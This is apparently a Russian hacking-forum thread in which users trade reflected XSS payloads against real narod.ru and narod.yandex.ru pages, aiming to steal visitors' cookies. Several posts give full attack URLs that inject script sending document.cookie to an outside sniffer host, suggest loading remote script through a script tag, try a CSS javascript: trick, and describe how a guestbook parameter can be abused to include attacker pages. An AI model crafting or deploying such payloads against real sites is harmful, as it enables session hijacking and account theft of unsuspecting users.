Повидимому так:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

К сожалению куки не идут, я такой запрос уже пробовал.

На саите даны 2 уязвимости, может вторая сработает, но как только я не подставлял ссылку на снифер, ниодного кука я не получил.

Пример №1:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('Bug')</script><a%20a=&c=2xaxa
Пример №2:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3E alert('x')%3C/script%3E

попробуй подгрузить через <img src=""; xss>, иль что еще лучше, что 100% должно прокатить, подгрузить код через <script src="">. Когда наработку одну мутил, тож куки не ишли, посему пришлось вот как исправлять ситуацию: http://hackzona.ru/hz.php?name=News&...rder=0&thold=0 чего и тебе советую, а именно подгуржать через <script src="">.

Вот за это спасибо, уже есть результат, но к сожалению на снифер приходит только ;document.cookie; при моем запросе:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><img src="мой_сниф/pic.gif?;"+document.cookie; xss><a a=&c=2xaxa

Поэксперементировав с запросами, кукисов я так и не получил, к сожалению.
За статью тоже спасибо, на днях буду тоже эксперементировать.

Может кто нибудь ещё знает, какие могут быть варианты с этими XSS?

Не, это неправильно, точнее сказать куки этим не схватить.
Держи примерный вариант про который я говорил:

Спасибо за скрипт,как я понял его надо сюда запихивать:

http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><img src="" style="background:white url(javascript:document.images[0].src='http://мой_сниф/pic.gif?'+document.cookie)"><a a=&c=2

если я правильно понял, то значит скрипт не работает.


А вот метод, описанный в твоё статье, ты давно проверял на работоспособность?

эххх че вы бредом маетесь уязвимость скажу я вам более чем интересная.
owner - там передается некий ид сайта (к сожалению все фильтруется). потом, с помощью запроса, сервер бд возвращает урл народовского сайта, если таковой имеется.
если mainhtml не передается или протсо содержит пустое значение, то отображается геста прилагаемая к этому сайту, иначе идет подставление SAIT+$mainhtml и отображается вместо гесты. Кстати говоря это имеенно чтение файлов на сайте, но на народовском сайте. потом посмотрю мож будет че нить умное...
Возвращаясь к хсс, зачем передавать их явно когда можа схитрить
_http://www.narod.ru/guestbook/?owner=21151691&mainhtml=mda.html